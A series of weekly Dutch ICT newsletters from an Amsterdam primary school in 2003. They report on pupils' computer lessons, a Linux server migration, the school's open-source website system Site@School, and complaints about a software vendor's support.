Op alle verdiepingen zijn nu de nieuwe computers van onze gemeentelijke dienst in gebruik. Als laatste waren de kleuters aan de beurt.

NIEUWE SERVERS

Dirk haalde nog een fout uit de nieuwe server en zal 'm dit weekend weer testen. De webserver kan dus tijdelijk buiten gebruik zijn. Het moment van ingebruikname nadert. De server voor de Daltonschool werkt nu ook en Fred en Dirk gaan 'm binnenkort testen.

Tot zover, goed weekend, groeten,
Karin
Dirk

2003-09-05 w36

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 2 - week 36 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ICT-LEERLIJN

Deze week is op het ABC hard gewerkt door Monique en Karin aan een jaarplanning per klas voor de ICT leerlijn. Er komen zowel een overzicht van de te behandelen stof als opdrachten per periode in het jaar. De bedoeling is, dat elk kind al die oefeningen doet, zodat ze behoorlijk leren tekstverwerken, maar ook overweg kunnen met een tekenprogramma en plaatjes leren invoegen. etc. Volgende week wordt het afgerond.

RSI PREVENTIE

Een onderdeel van de ICT-leerlijn zal RSI-preventie zijn. We zoeken de ideale stoel voor kinderen. Er wordt uitgezocht of er NEN-normen voor kinderen zijn. Hierover hoort u later meer.

SOFTWARE

Deze week is het programma Educat-b (een bibliotheekprogramma zie: http://www.educat.nl/) door Dirk op de server gezet, zodat het op de eerste verdieping gebruikt kan gaan worden om onze bibliotheekboeken te saneren. Bij de kleuters is het al ruim een jaar in gebruik. Een medewerker van de OME is op school geweest om ons te adviseren. Het programma ?edurom klokkijken? werkt prima vanaf de server en de toetsen kunnen ook geprint worden.

KLEUTERCOMPUTERS

Na wat startproblemen met de nieuwe computers kunnen de kleuters nu volop werken met allerlei programma?s. Letterpret, door Dirk omgedoopt tot Etterprut, heeft weer veel storingen opgeleverd en ook kwamen er vreemde -voor velerlei uitleg vatbare- antwoorden van de helpdesk: ?u moet de leerlingen meer rechten geven?. Heldere helpdesk! Dirk kan er zo langzamerhand wel een soap over schrijven. Wat een tijd en geduld moet je hebben. Tijd voor het manual: etterprut en samba. Belangstelling? Voor de leerkrachten is er nu een speciale gebruiksaanwijzing voor het starten en afsluiten van dit programma bij de computers opgehangen.

SERVER

Er wordt hard gewerkt aan de nieuwe server. Er is nu ook een nieuwe firewall. Binnenkort een oproep aan jullie om 'm te testen op brandveiligheid.

SCHOOL OPRUIMEN

Deze week zijn we weer verder gegaan met de opruiming. De school moet netjes worden voor de viering van het 10-jarig bestaan op 25 september. Er zijn haakjes vastgeplakt aan de monitoren om koptelefoons aan op te hangen. Bij nader inzien kunnen ze beter aan de linker kant van de monitor. Zo blijf je bezig?. Ook de papierwinkel wordt drastisch aangepakt. Oude handleidingen etc. gaan allemaal weg.

WEBSITE

Aan onze statistieken kunnen we zien, dat onze website flink bezocht wordt. Wij staan open voor opbouwende op- en aanmerkingen.

SITE@SCHOOL

Fred werkt keihard aan een aantal verbeteringen. Binnenkort komt  versie 1.2.1 uit met een aantal verbeteringen en bugfixes.

groeten,
Karin
Dirk

2003-09-12 w37

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 2 - week 37 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

WERK AAN ICT LEERLIJN

We zijn gevorderd tot het maken van tekstverwerkingsopdrachten en werkstukopdrachten tot aan de kerstvakantie. Volgende week worden die opdrachten uitgedeeld aan betrokkenen. Ook zullen er afspraken gemaakt worden met de kleuterbouw voor klassenconsulten. (In groep 5 is een begin gemaakt met het leren kopiëren en plakken van woorden en regels.)

LESSUGGESTIES

Leerkrachten: regelmatig worden er e-zines op onze site gezet waarin veel handige ideeën staan voor in de klas.

PROFIEL LEERLINGZORG

Het programma dat de school inzicht geeft in ...... kan nog niet goed printen. Ook de verbeterde printfunctie die beloofd was in de nieuwe versie werkt nog niet naar behoren. We maken dus maar screendumps. Trouwens, de installatie van het programma duurde ook vreselijk lang.

OPZEGGEN KENNISNET

We kregen de offerte binnen voor een nieuw Kennisnet contract en vielen van onze stoel van verbazing. Een kleine EUR 500 per maand (incl. BTW) voor een eenvoudige basisschoolaansluiting. We hebben Kennisnet opgezegd met de vermelding dat hun offerte geen aanleiding is tot nadere onderhandelingen. We vroegen XS4ALL om een scherpe offerte uit te brengen. Zij schreven terug: op dit moment is kpn in overleg met de opta over de aanbieding. deze is zo scherp dat er eerst toestemming gevraagd moet worden. eind van de week weten we meer. Verder kregen we mail van LAN AT WORK, een ideële instelling voor Internet. Krijgen we nog een offerte van. We houden jullie op de hoogte. Bijdrage OCenW voor internetaansluiting op school vastgesteld Het ministerie van OCenW heeft vastgesteld welke bedragen scholen in 2004 minimaal ontvangen voor hun internetaansluiting. Het ministerie heeft dit per brief aan de scholen gemeld. De financiële regeling is getroffen omdat scholen vanaf 1 januari 2004 zelf een Internet Provider gaan kiezen. Vanaf die datum vervalt namelijk het centrale contract van de overheid. Scholen voor voortgezet onderwijs krijgen €15,- per leerling. Basisscholen krijgen een bedrag van € 1500 + € 7,50 per leerling. Voor de BVE-sector is een aparte regeling getroffen. bron: www.ictonderwijs.nl

NIEUW LETTERTYPE

Een collega bij ons op school houdt van het lettertype Lucida handwriting. Het wordt niet standaard meegeleverd met Office97. Dus op haar verzoek toegevoegd aan haar computer. Het ziet er fantastisch uit. Maar wel een rare z. Zo ziet dat lettertype eruit.

ICT/GELDEN IN EIGEN BEHEER

We hebben van ons bestuur bericht gekregen, dat ons ICT beleidsplan voldoet, en dat ons - door het ministerie overgemaakte - ICT geld op onze rekening wordt gestort.

S@S - stageoverleg

Martin Herrman van de TU Eindhoven is bij ons zijn stage begonnen. Hij werkt aan modules voor S@S. en begint aan een fotoalbum.

SERVER-MIGRATIE

Voor de buitenwereld in alle stilte, maar hier met de nodige spanning, is onze nieuwe server in gebruik genomen. We hebben nu een RH7.3 server op een Compaq Proliant 800 van onze gulle Gemeentelijke Dienst. Voor de liefhebbers is het verslag van de bouw van de server beschikbaar. Mail ons. Bedankt, Kraamzorg Amsterdam voor jullie server die ons de afgelopen jaren zonder storingen heeft gediend. Hij gaat zijn derde leven in het Noorden beginnen.

OSSL

Het Open Source Software Lab is een Nederlandse organisatie die info geeft over OSS. We hadden Erik Dooper op bezoek die naar S@S kwam kijken om 't te beoordelen en toe te voegen aan de OSSL site http://www.ossl.nl

groeten,
Karin
Dirk

2003-09-19 w38

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie nieuwsbrief via Rosa Boekdrukker Jaargang 2 - week 38 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ICT TEGENSLAGEN

Je hebt van die weken dat alles tegen zit. Dat hadden wij op ICT gebied. Vorige week is de webserver overgezet op een nieuwe server en tegelijk is ook de laatste versie van Site@school erop gezet. Alles leek vlekkeloos te zijn verlopen. Maar helaas zaten er nog wat vreemde dingen in. Rare tekens (nu verholpen) en problemen met het email gedeelte. Als een leerling wat heeft veranderd aan zijn/haar pagina, moet er vanzelf een emailtje naar de leerkracht gaan. Dat werkt (nog) niet. ZIE OOK ONDERIN BIJ : HELP! (voor de technici)

PAINT GROEP

Alle kinderen uit groep 3 hebben een tekening in Paint gemaakt. De meeste creaties zijn al te bewonderen op: http://rosaboekdrukker.net/index.php?section=4&page=502

KIJKDOOS

Martin is begonnen met de S@S module die ons een foto album zal opleveren. We hebben een lang gesprek gehad over onze verlangens (User Requirements).Hier is een sneak preview: http://sasmodulesi.sourceforge.net/kijkdoos/docs/prototype/prototype-0.0.1/visitor/index.html Let op: het is een prototype, dus veel links werken niet

ICT LEERLIJN

In groep 5 wordt hard gewerkt aan het knippen en plakken in Word. Er wordt geoefend met een gedicht van Gerrit Komrij waarvan de versregels in de war zijn. De kinderen leren het nu aan elkaar. Probleem blijft wel: hoe pas je het in in het lesrooster. We worden zo wel gedwongen om taakuren in te stellen. Ook is er een voorzichtig begin gemaakt met de voorbereidingen voor het maken van een werkstuk in groep 5. Een leerling kiest een informatieboekje over een dier, formuleert vragen en zoekt vervolgens de antwoorden in het boekje.

SITE@SCHOOL ZWEEDS

We werden verrast met een vertaling van S@S in het Zweeds! Daniel, vrijwilliger op een Montessori school zei dat hij voor S@S wilde gaan werken en wilde onze school zelfs een donatie sturen voor al het werk dat we aan S@S verrichten. S@S is nu beschikbaar in 9 talen!

SITE @ SCHOOL IN VIVES

We stonden in het vakblad van de ICT-vernieuwingen binnen het onderwijs. (pagina 16) Sindsdien is het aantal "hits" van onze website enorm toegenomen.

KRAP ICT BUDGET?

Het moet nu maar eens klip en klaar gezegd worden. De scholen die tegenwoordig nog nieuwe computers kopen zijn geschift. Dagelijks zien wij aanbiedingen voorbij komen van partijen lease- of afgeschreven computers. Tweedehands Pentium III 400-800 Mhz, 128 MB RAM 10/100 netkaart, CD-Rom, grote HD. Prijzen: van 200 tot 300 EURO. Wij horen van basisscholen die P4 2,4 Ghz comps kopen voor EUR 1000 en meer. Als je dat doet moet je niet piepen dat je ICT budget ontoereikend is. Je hebt het er zelf naar gemaakt.

SERVER

De nieuw in gebruik genomen server heeft nog wat fine tune problemen. Zo kregen we de POP server niet aan de praat. Het bleek een PAM probleem. Dankzij onze helpers komen we er uit, maar het zijn hardnekkige zaken die Dirk grijzer haren bezorgen. Hij zegt dat ie veel leert, dus dat scheelt weer.

SCHOLEN GRONINGEN EN DRENTHE

Deze week kwam onze gemeentelijke dienst weer een partij monitoren brengen. Daarmee is de zending voor 't noorden compleet. Volgend weekend gaat de eerste zending (vijftien stuks) weg. Dat ruimt op!

ICT BORREL

We hadden onze ICT Borrel. 1 Keer per jaar bedanken we al onze adviseurs en helpers door hen uit te nodigen op onze jaarlijkse ICT Borrel. (zie de foto's op: http://rosaboekdrukker.net/index.php?section=6&page=494) We hebben de uitnodigingen met de grootst mogelijke zorgvuldigheid gemaakt. Toch zou het kunnen dat we iemand vergeten zijn. Mocht u het idee hebben dat we u zijn vergeten, wilt u het ons dan melden. Dan kunnen wij kijken hoe we deze ernstige omissie onzerzijds kunnen goedmaken.

MEER COMPUTERS

We kregen van onze gemeentelijke dient nog wat computers: PII 400 MHZ. Kochten er wat geheugen en een geluidskaartje bij. Totale kosten per computer € 50,-. We hebben nu 40 van dit type. Omdat ze allemaal identiek zijn, zijn ze makkelijk in onderhoud (images).

HELP:

We zitten met een groot probleem: Users kunnen niet mailen vanaf de server. Als user dirk mailt krijgt hij: /usr/sbin/sendmail: Permission denied. Root kan wel mailen. Als je vanaf een client een mail naar Dirk stuurt wordt ie ontvangen en doorgestuurd( naar het adres dat in .forward staat). We weten niet of het mailprobleem van S@S (zie boven) ermee te maken heeft. We willen eerst het mailprobleem oplossen voordat we het s@sprobleem oplossen.

groeten,
Karin
Dirk

2003-09-26 w39

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie nieuwsbrief via Rosa Boekdrukker Jaargang 2 - week 39 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

OPLOSSING EMAIL PROBLEEM: ZIE ONDER

LETTERPRET

Letterpret blijft problemen geven. Wij schreven dat aan de helpdesk. Ze kwamen aanzetten met een installatiehandleiding die zeer afwijkt van de handleiding die ze op de CD hebben. We gaan het nog een keer proberen. Het moet echt gaan lukken, want de kleuters moeten er flink mee aan de slag. De bedoeling was, dat de klassenconsulten die voor deze periode gepland staan de leerkrachten helpen bij de implementatie.

KIJKDOOS

Martin is hard aan het werk aan onze nieuwe S@S module. Het prototype van het fotoalbum is klaar en volgende week begin het coderen.

TAFELS BESTELLEN

We zijn nog op zoek naar geschikte computertafels. Er is jammer genoeg niet gereageerd op een oproep voor tweedehands Comeniustafels.

SITE@SCHOOL BEOORDELING

Op http://www.ossl.nl krijgt ons CMS een uitstekende beoordeling. Bedankt Erik Dooper!

OPLOSSING EMAIL PROBLEEM

Er ontbrak een regel in /etc/httpd/conf/htttpd.conf, waarin: AddType application/x-httpd-php .php. Het gekke was dat PHP het dus prima deed op de mailfunctie na. Iedereen zeer hartelijk dank voor het meedenken en de vele tips en suggesties.

SPAM

We hebben er nog nauwelijks last van, maar dat gaat veranderen. We vonden een prima manual om er op de server wat aan te doen: http://www.mesoscale.iastate.edu/spam/dummies.html Het script in het manual werkte niet helemaal goed, maar Cor Gest paste het aan en gaf er nog een extra functionaliteit aan. We kunnen nu onze spamblocklist op onze site publiceren zodat andere scholen er ook gebruik van kunnen maken. Zeer bedankt Cor!

groeten,
Karin
Dirk

2003-10-03 w40

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 2 - week 40 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

VERKEER

Onze school is pilot voor een verkeersprogramma, ontwikkeld door onze schoolbegeleidingsdienst in opdracht van de Gemeente Amsterdam. De komende weken gaan we met een aantal kinderen een aantal opdrachten uitvoeren.

ICT LEERLIJN OPDRACHTEN

Op een vergadering deze week zijn de opdrachten voor de ict+leerlijn verstrekt aan de groepen 3 tot en met 8. Ze hebben een overzicht van de jaarplanning gekregen en een uitgewerkt plan voor de periode tot de kerstvakantie. De kinderen oefenen in ongeveer 5 opdrachten een aantal vaardigheden. Uitworstelen de komende tijd: hoe organiseer je het in de klas?

ETTERPRUT SORES

Het lijkt een hopeloze zaak te worden. Na een stevig (zacht uitgedrukt) telefoongesprek hebben we weer een nieuwe installatie diskette ontvangen. Met de nieuw aangeleverde handleiding is Dirk hoopvol aan de slag gegaan… Maar we kregen dezelfde fout als 9 maanden geleden toen we aan dit project begonnen. Brief op poten naar de helpdesk.

NSA (na schoolse activiteiten)

Uit het ICT budget gaan we iemand aantrekken die na schooltijd een groepje van 10 kinderen begeleidt met ICT opdrachten. Leuke dingen die je met tekstverwerken kunt doen. Een aantal malen per jaar gaan we die activiteit aanbieden ter vergroting van de kwaliteiten van onze leerlingen. Nadere informatie volgt, als alles concreter is geworden.

GEEN CD-ROM MEER

Onze nieuwe computers hebben geen cd-rom speler. Veel computers in school hadden al geen cd meer. Voor geluid afspelen zijn er nu in de klassen radio/cd spelers. Software op cd mocht al niet meer zomaar geïnstalleerd worden. Wie software in de klas nodig heeft kan daar een verzoek voor indienen. Mocht alsnog blijken, dat er in een klas toch dringend behoefte is aan een cd-rom speler, dan zullen we naar oplossingen zoeken.

COMPUTER GERDA

Storing: kon niet printen. Netwerkstekkertje niet goed vast. De computer staat op de grond. Dat is niet goed. Schoonmakers etc. Stekkertje vastzetten is dus geen goede oplossing. De computer moet van de grond af.

NETWERKPRINTERS

We beginnen nu ook onze netwerkprinters onder Linux aan de praat te krijgen.

E-MAIL ADRESSEN

Agnes heeft nu een eigen emailadres. Dat is een lastig emailadres. Als een stuk achter de @ wat onhandig is, kan je het beste onmiddellijk zo'n adres in Foutlook in het adresboek zetten, dan hoef je 't niet iedere keer te typen. Dirk verdiept zich nu in de configuratie van de mailserver om te kijken hoe je veel email adressen kan krijgen. En dan nog graag met @rosaboekdrukker.nogwat!!

KENNISNET EN KPN

We hebben Kennisnet opgezegd en denken over het 'gratis' aanbod van de KPN voor scholen. Denk niet dat het gratis is, vrienden. De prijs kan wel eens hoog zijn.

POLS

Omdat we op onze website een verwijzing naar het e-zine POLS hebben, wordt onze school nu genoemd. Weer een enorme toename in de statistieken. Kijk hier.

STATISTIEKEN

Op onze website is te zien hoevaak S@S gedownload wordt. Kijk hier.

SCHOLEN IN HET NOORDEN

Afgelopen weekend en vandaag zijn alle computers van de vorige generatie van onze gemeentelijke dienst naar Bourtange en Annerveenschekanaal gegaan. Bij elkaar zo'n 40 stuks. De kelder bij Dirk is weer redelijk leeg. We hebben nog een paar servers voor de liefhebbers (scholen).

Goed weekend,
Karin,
Dirk.

2003-10-10 w41

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 2 - week 41 - 2003
++++++++++++++++++++++++++++++++++++++++++++++++++++++

COMPUTERLES GROEP 6 OP ABC

Keihard hebben ze tweeëneenhalf uur gezwoegd op opdrachten. Tekstje typen, plaatje invoegen uit clipart. Een tekeningetje maken in paint, opslaan en later weer invoegen in het tekstje. Een plaatje van internet halen, opslaan en invoegen.

Na de herfstvakantie gaan we ermee verder bij ons op school. (de leerlingen vroegen of ze nu elke maandag naar het ABC gingen!!!)

STROOMUITVAL

Afgelopen maandag werden we 3x getroffen door stroomuitval. Een aantal plekken op de eerste verdieping en een aantal op de tweede zat steeds zonder stroom. Het kwam doordat een toch al zwaarbelaste groep last kreeg van overbelasting doordat de klei-oven voor het eerst aanstond. Elektriciens hebben het nog diezelfde dag hersteld door de belasting over meerdere fases te verdelen.

VERKEER

Onze school is pilotschool voor het nieuwe verkeersprogramma. 6 leerlingen uit de groepen 7 en 8 zijn aan de gang gegaan met het maken van de opdrachten. Het vereist wel goed lezen!!

Het programma draait in ons (? en ander?) netwerk erg langzaam. Door het te kopiëren naar de harde schijf was de traagheid voorbij.

LETTERPRET

Na een week nog steeds geen reactie op onze boze email ontvangen.

We hebben een nog stelliger email gestuurd. Gaan we over op Schatkist met de Muis?? Ontbinden we het contract met Malmberg? Of maken we er een zaak van? Wij koken zo langzamerhand. En de ICT leerlijn staat zo op het punt van afbreken.

SITE@SCHOOL

Joepie! De tiende taal van Site@School is binnen. De eer viel te beurt aan het Frans. Verder zijn we druk bezig met de voorbereidingen voor versie 2. Dat wil zeggen dat ideeën welkom zijn.

De versie zal komend voorjaar/zomer uitkomen.

Ideeën tot nu toe:
- Verfijnd beheer van modules. Daardoor kun je b.v. leerlingen verantwoordelijkheden geven over een stukje van S@S.  Of leerkrachten. E.e.a. is bedoeld om het beheer van S@S in meerdere handen te kunnen leggen.
- Een intranet voor leerkrachten: Een gedeelte van de site waar je alleen met wachtwoord kan komen. Handig voor notulen, agenda's, etc.
- Leerlingen die meerdere pagina's kunnen hebben.
- Alerts: Mensen kunnen een email ontvangen als er iets op een pagina wijzigt.
E.e.a. is nog experimenteel en het is nog niet duidelijk of 't er in kan. Ideeën zijn welkom!

SERVER NU TE KOOP

Sinds kort is de super-beveiligde server die Dirk maakte op basis van G. Mourani's boek "Securing and Otimizing Red Hat Linux" ook direct te koop. Voor $ 47,95 kun je bij http://www.openna.com de CD's kopen met de te installeren software en een handleiding (boek). Dat is makkelijk. In 10 minuten heb je ook zo'n server! En voor die prijs mag je de CD's zelfs onbeperkt en legaal kopiëren (GPL software).

VAKANTIE

Wij hebben volgende week herfstvakantie, dus geen BIC.

Allen een goede vakantie, voor de rest: werkze

VOOR MENSEN DIE ZICH VERVELEN IN DE HERFSTVAKANTIE:

Bekijk de lessuggesties of de sites van de schooltv.

Karin,
Dirk

2003-10-24 w43

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 43 - 2003
Wat is er de afgelopen week op ICT gebied op de Rosa Boekdrukker gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

HOERA HOERA!!

Dit wordt het derde jaar, dat we de wekelijkse nieuwsbrief uitbrengen. Tijd voor een mini-enquête. Wat vinden jullie van de nieuwsbrief?

ONDERWIJSINHOUDELIJK

In groep 4 is begonnen aan de vervolgopdracht PAINT. Eén kind kreeg instructie wat er moest gebeuren en daarna hebben de leerlingen elkaar verder geholpen. Te bewonderen  o.a. hier.

Opdrachten aan andere groepen Ook de andere groepen moeten verder met de ICT leerlijn. Gedetailleerde instructies voor de groepen 3 en 5 liggen klaar. De rest volgt binnenkort.

KLASSENCONSULTEN KLEUTERBOUW

Door de stagnatie van het gebruik van het programma Letterpret van de firma Malmberg zijn de afspraken voor de klassenconsulten veranderd in observatie van het gebruik van het programma "Alles Telt" (van Thieme Meulenhoff). Maar helaas was dat programma nog niet optimaal in gebruik. Er is kostbare scholingstijd/geld verloren gegaan. Zou dat te verhalen zijn op de uitgever?

LEERLINGPAGINA'S

Deze week zijn er weer twee leerlingen begonnen aan een eigen pagina op onze website. De instructies krijgen ze via de chat van Messenger. KIJK HIER

OPENEN/OPSLAAN IN WORD

Er zijn heel vaak kinderen in de war met de begrippen 'Openen' en 'Opslaan'. Zou het kunnen zijn, dat de woorden teveel op elkaar lijken? Het gebeurt zo vaak, dat leerlingen hun werk willen ophalen en dat in een leeg document doen met opslaan. En dan is het oorspronkelijke document weg. Als nou in plaats van opslaan BEWAREN werd gebruikt, zou het dan minder voorkomen??

VERKEER

Graag aandacht voor het ingevoegde document. (Acrobat reader nodig om het te lezen.) nieuwsbrief tussen school en thuis 10-032.pdf (NB. bestand is verloren gegaan)

S@S

Bijna dagelijks zijn er ontwikkelingen. Deze week heeft Fred de leraar login zodanig gemaakt, dat we een eigen intrAnet kunnen hebben. Binnekort kunnen de leerkrachten van de Rosa Boekdrukker met een wachtwoord interne mededelingen lezen op onze site en notulen, verslagen, e.d. direct invoeren. Ook 'Deze Week' (wekelijkse interne kalender met afspraken) kan dan direct op de site gemaakt en gelezen worden.
Laatste nieuws: S@S TURKS is onderweg (11e taal).

VORDERINGEN FOTOALBUM

In S@S ontbreekt nog een foto-album. Zeer tot verdriet van Karin die de vele foto's niet snel en netjes kan opbergen en presenteren. Onze stagiaire Martin is nu volop aan het programmeren en dagelijks stromen de nieuwe versies binnen. Dirk en Fred testen en geven commentaar. Resultaat is te zien op http://wyxs.net/index.php

NETWERK storing

Van de week was er opeens geen internetverbinding meer. Twee mannen waren bezig om in het zandbakspeeltuigenhok planken op te hangen. In dat hok zit ook de meterkast waar alle verbindingen ons gebouw binnenkomen. Daar staan ook onze routers. Blijkbaar hadden ze tegen een stekker gestoten, want de routers zaten zonder stroom.

NIEUWE DOMENNAAM

Sinds deze week zijn we ook te bereiken via http://www.rosaboekdrukker.net en zelfs rosaboekdrukker.net . (zonder www ) Met deze domeinnamen zijn we instaat om de emailadressen op onze mailserver te voorzien van een fatsoenlijke extensie. Het zelf runnen van een email server bij UPC kost € 50.- p.m.

GEBRUIKT COMPUTERMATERIAAL

Via Tibor Visser uit Almere ontvingen we een partijtje onderdelen waaronder de felbegeerde SCSI terminators. Resultaat: alle servers die we van onze gemeentelijke dienst kregen werken nu. Er zijn er nog een paar servers in de aanbieding voor scholen. Bedankt Tibor!

ANTI VIRUS

Deze week hebben we een nieuw contract afgesloten bij het APS. Voor 3 jaar zijn we beschermd tegen aanvallen van buitenaf, met Norton Antivirus. Tegenwoordig hoef je niet meer die hele papierwinkel af te werken. Het kan allemaal on-line bij het APS.

LETTERPRET - the continuing story

In de vakantie ontvingen we een mail van de helpdesk. We willen 'm jullie, ter ere van ons 2 jarig jubileum, niet ontzeggen:

Geachte mevrouw Abma,
Sinds enkele dagen is bij ons bekend dat de meldingen 'file in use', 'multiple net user files in use''pdoxusrs.net / * lck files', en kan dll bibliotheek niet laden voornamelijk voorkomen op netwerken met Linux/Samba. Het programma is niet getest en gegarandeerd op Linux. Ik kan u doorverwijzen naar de …school (contactpersoon: …) waar Letterpret correct werkt op Linux, zij kunnen misschien enige assistentie bieden. Als de problemen zich blijven voordoen, mag u contact opnemen met Malmberg verkoop (tel. 073-6288722) over de mogelijkheid om Letterpret te retourneren. Het spijt mij dat ik niet meer voor u kan doen.

Tot zover de brief. We hebben al tijden geleden contact gehad met die school. Ze konden ons niets vertellen. De brief van Malmberg maakte ons woest vanwege:
- Tegen Bas (Corantijn) zeiden ze dat ze Linux wel ondersteunen.
- Het toontje van: 'u mag contact' opnemen. Wat een arrogantie. We hoorden van een school in Slotervaart die ook problemen met Letterpret heeft. Zij zitten bij Heutink. Wij vinden het tijd worden voor actie richting Malmberg en beraden ons op juridische stappen.

groeten,
Karin
Dirk

2003-10-31 w44

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 44 - 2003
Wat is er de ze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Naar aanleiding van de antwoorden op de oproep ”wat vindt u van onze nieuwsbrief” zullen wij proberen steeds te beginnen met informatie die onderwijsinhoudelijk is. Daarna de vorderingen in S@S. En tenslotte de meer technische informatie over netwerken e.d.

ONDERWIJSINHOUDELIJK

LESSEN TEKSTVERWERKING

Behalve voor groep 8 zijn nu alle opdrachten voor de komende maanden aangepast. Voor elke groep is er een overzicht van opdrachten. Groep 7 is aan het werk gegaan met opsommingstekens, spellingcontrole, plaatjes invoegen en tekstomloop. Een groepje van zes leerlingen begon. Telkens als een kind klaar was, werd een nieuw kind geroepen. Het eerste kind gaf de instructie aan de tweede. De instructie moest “met de mond” gegeven worden. Het werkte als een trein. Na drie kwartier hadden twaalf kinderen de opdrachten gedaan. Groep 6 krijgt volgende week een zetje van de ICT coördinator. Bij groep 3, 4 en 5 lukt alles goed. De groepen 7/8 en 8 krijgen binnenkort ook een zet van de ICT coördinator

ETTERPRUT (het vervolgverhaal)

Volgende week gaat een brief de deur uit naar het management van Malmberg over de slechte service.

MUIZEN

Bijna overal in de school zijn de muizen vervangen door scroll-muizen.

SNEL VINDEN VIA KENNISNET

snel vinden

LESSUGGESTIES

Er is weer een nieuwe nieuwsbrief van kennisnet op onze website. nieuwsbrief kennisnet

CHATTEN

Wij willen op onze website een chatmogelijkheid hebben waarbij de leerlingen met een wachtwoord inloggen. Het gebruik van het programma Messenger staan wij niet toe, omdat we geen zicht hebben op wat ze daar doen/zeggen/schrijven. Deze week hebben we op een plek op de server log-files van juni 2003 gevonden van een groep die wel heeft gechat met zelf gedownloade messenger op school. De inhoud zal gebruikt worden voor een voorlichting over chatten. Hierover later meer.

EMAIL ADRESSEN

Alle groepen en de directie hebben nu een adres met xxx@rosaboekdrukker.net. (let op: de extensie is .NET)

EDUCAT-B

Mieke heeft les gehad in het invoeren van de nieuwe boeken in Educat door een medewerker van de onderwijsmediatheekdienst. Binnenkort zal dus onze bibliotheek ook geautomatiseerd zijn.

PORTEFEUILLEHOUDER ONDERWIJS OP BEZOEK

We kregen mevrouw Smeels op bezoek die zich uitvoerig door Dirk heeft laten voorlichten over ons CMS. Zij was zeer onder de indruk van de unieke mogelijkheden van het systeem voor basisscholen.

en nu de technische taal:

SITE@SCHOOL

Martin levert regelmatig een stuk code voor het foto-album. Iedere keer komt er een stukje functionaliteit bij. Karin, Fred en Dirk testen en leveren commentaar. We hopen dat 't op tijd af is. Deze week kregen we de Poolse versie van S@S binnen. Daarmee is het aantal talen gestegen tot 11. Turks is onderweg, horen we uit Turkije. Fred werkt keihard aan Versie 2 en we hopen (maar vertel 't niet verder!) dat we in december ermee kunnen uitkomen. Zie voor nieuws over versie 2: http://siteatschool.sourceforge.net We stuurden een sneak preview aan Peter die 'm wil uitproberen. Bedankt Peter! We kregen al een paar zeer waardevolle suggesties van hem.

DIVERSEN

De server die via de gemeentelijke dienst bij de tweede Dalton terecht kwam, werkt op dit moment. Fred en Dirk kregen 'm in een paar uur aan de praat. Ze hadden een Windows NT server en die kan nu weg. Dat scheelt licentiekosten!

Goed weekend,
Karin,
Dirk

2003-11-07 w45

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 45 - 2003
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ONDERWIJSINHOUDELIJK

LESSUGGESTIES

Kennisnet (moet u er ook niet aan denken, dat er 1499 collega´s bij u in de klas staan??) Vorige week hebben we een link gegeven naar de laatste kennisnet nieuwsbrief zonder verder commentaar. Maar kijk eens naar kabouter Pierelier: door hem kunnen de leerlingen ook wat leren over de herfst.Nieuwsbrief nummer 12 is uit en staat op onze site hier.

Nieuws uit de Natuur

Vorige week hebben we ons geregistreerd bij JopSoft (http://jopsoft.free.fr), een software bedrijfje. In de nieuwsgroep nl.onderwijs.algemeen viel namelijk te lezen, dat ze een toetsje hebben ontwikkeld met vragen over Nieuws uit de Natuur. Dat programma wordt in ons netwerk geïnstalleerd en dan kunnen de leerlingen die dat schoolt.v.-programma bekijken (doorgaans de groepen 5 en 6) hun opgedane kennis toetsen. Kosten: € 10.-

Sinterklaas

Hij komt er weer aan. Zijn email adres is nog hetzelfde als vorig jaar. Wie heeft er nog leuke Sinterklaasideeën voor de website van school?

Computers voor peuters??

Lees over het gebruik van de KidSmart computer op scholen in Zoetermeer: http://rosaboekdrukker.net/index.php?section=10&page=604 (met dank aan onze stagiaire Martin).

TECHNISCH

Site@School nieuws

De 10 vertalers van S@S zijn begonnen aan het vertalen van S@S versie2. We hopen dat ze eind van de maand klaar zijn en dat versie 2 in december uit kan komen. Dirk is helemaal weg van de nieuwe functies. We zijn ook bezig met een agenda/kalender voor S@S. Eerste onderzoek gedaan op Internet (pff, Dirk heeft ze alle 85 bekeken). Daar kwamen veel ideeën uit en mogelijk een interessant script dat als basis gaat dienen. Onze stagiaire Martin werkt door aan het foto-album. Midden volgende week is een bruikbare versie gereed. De rest van zijn stageperiode (tot begin december)  zal hij besteden aan de het programmeren van de overblijvende gebruikers eisen.

Teller

We hebben weer een werkende internet dataverkeer teller. Dank Wouter! Ook voor de helpdesk arbeid die je voor Dirk verrichtte om e.e.a. werkend op onze server te krijgen. Met deze teller kunnen we per dag en per maand zien wat we aan dataverkeer hebben. De 2 e Dalton heeft er ook belangstelling voor. Meld je als je 'm ook op je (Linux) server wilt. Een sneak preview is op: http://rosaboekdrukker.net/serverstat/ Uiteraard moet de teller nog aan onze lay-out wensen aangepast worden.

Tot zover, goed weekend,
Karin,
Dirk

2003-11-14 w46

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 46 - 2003
Wat is er de ze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Onderwijsinhoudelijk

